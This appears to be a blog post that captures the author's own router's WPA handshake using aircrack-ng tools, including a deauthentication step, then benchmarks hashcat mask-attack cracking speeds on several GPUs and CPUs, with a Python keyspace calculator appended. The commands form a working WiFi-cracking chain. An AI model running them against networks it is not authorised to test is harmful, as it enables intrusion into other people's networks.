An interesting alternate use of GPU acceleration (aside from training neural-networks) naturally lies in the realm of password-cracking. I was curious about the speed-up this provided relative to multi-processing on the CPU and decided to try it out myself. First, I need some data.
Step A: Collecting the Data (Capturing my router’s WPA Handshake)
airmon-ng # check the name of my wireless card
airmon-ng check kill # stop processes to restart in monitoring mode
airmon-ng start wlan0 # restart in monitoring mode
airodump-ng wlan0mon # start the sniffer
airodump-ng -c (my router’s channel) --bssid (my router’s MAC) --essid (my router’s network name) -w (name of capture file) wlan0mon # Optionally specifying the network’s name just to keep track and make sure I’m not accidentally sniffing a foreign network
Now I am locked onto the channel and frequency of my SKY router and just need to kick my iPhone off the network so that it reconnects and I can capture the WPA handshake:
aireplay-ng -0 (number of deauths) -a (my router’s MAC) -c (my iPhone’s MAC) wlan0mon # I issue 10 requests to disconnect my iPhone
The WPA handshake is successfully captured. Now I just need to clean the capture so that it contains only the handshake for Hashcat:
wpaclean (clean output name).cap (input name).cap
Finally converting it into a .hccap file:
aircrack-ng (clean output name).cap -J (final file)
Step B: Hashcat + Nvidia GTX 980
I create a small script (.bat) file with the following lines of code:
cudaHashcat64.exe -m 2500 -a3 hash_test\(final file).hccap ?u?u?u?u?u?u?u?u
This type of brute-force attack is called a mask attack and helps me save a great deal of time. I know that SKY router passwords are 8 upper-case characters (producing a character-space of 208,827,064,576 possibilities).
Now the interesting stuff begins: we notice that GTX 980 is ripping through at a rate of 211,300 keys a second. At that rate we have an expected cracking-duration of around 6 days.
The average speed I was getting on the CPU (using aircrack-ng) was just below 5,000 keys a second, so the GTX 980 is more than 40x faster!
Using a slightly better CPU (Xeon E5 2687) we can up this to 7,610 keys a second:
In fact, running the same operation on a friend’s laptop (GPU-accelerated), we hit 15,000 keys a second (3x faster).
Interestingly, I got lucky and the algorithm cracked in around 7 hours:
As an aside – running on a powerful 16-core server (E5-2667) gets us 16,240 words a second (about the same as a GPU on a mid-level gaming laptop):
Step C: Some lower-cost DIY solutions
The GTX 980 is very expensive and currently stands at around £500 (it was purchased for around £900). I was curious about a cheaper solution (getting cheaper cards on eBay and running the algorithm on multiple cards) and opted for 2 GTX 770s, which I found used on eBay for around £100 each.
I decided to mount these on the top of my computer for maximum ventilation with a bit of drilling:
The end result was interesting: around 115,000 keys a second (across both cards). That is relatively more expensive than the GTX 980, but I think it is a good option for those not willing to knock out £500+ on a graphics card!
GTX 980X – 211,300
GTX 770 – 55,000
E5-2667 (16 core) – 16,240
Laptop GPU – 15,000
E5-2687 (8 core) – 7,610
i7 4790 (4 core) – 4,530
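To put the keyspace figure and these rates in context when choosing a router passphrase, here is an added example (not part of the original post) that computes the candidate count for a hashcat-style mask and the average search time at the speeds quoted above. The function names and the two longer comparison masks are assumptions made for illustration; custom charsets (?1 to ?4) are not handled.

```python
# Added example: keyspace and average search time for a hashcat-style mask.
# Sizes of hashcat's built-in charsets (?l ?u ?d ?h ?H ?s ?a ?b).
BUILTIN = {"l": 26, "u": 26, "d": 10, "h": 16, "H": 16, "s": 33, "a": 95, "b": 256}

# Keys-per-second figures quoted in this post.
RATES = {
    "GTX 980": 211_300,
    "2x GTX 770": 115_000,
    "E5-2667 (16 core)": 16_240,
    "i7 4790 (4 core)": 4_530,
}


def mask_keyspace(mask: str) -> int:
    """Return the number of candidates a mask generates."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            code = mask[i + 1]
            if code == "?":            # '??' is a literal question mark
                pass
            elif code in BUILTIN:
                total *= BUILTIN[code]
            else:                      # e.g. custom charsets ?1..?4
                raise ValueError(f"unsupported charset ?{code}")
            i += 2
        else:                          # literal character: a single choice
            i += 1
    return total


def expected_days(mask: str, keys_per_second: float) -> float:
    """Average time to a hit (half the keyspace searched), in days."""
    return mask_keyspace(mask) / 2 / keys_per_second / 86_400


if __name__ == "__main__":
    # Only the first mask is from the post; the other two are constructed
    # comparisons for a passphrase that is not 8 upper-case letters.
    for mask in ("?u" * 8, "?a" * 8, "?a" * 12):
        print(f"{mask}: {mask_keyspace(mask):,} candidates")
        for name, rate in RATES.items():
            print(f"  {name:<18} {expected_days(mask, rate):,.1f} days on average")
```

The first mask reproduces the 208,827,064,576 figure and the roughly 6-day average on the GTX 980; the longer masks show how quickly the estimate grows once the passphrase leaves the 8-upper-case pattern.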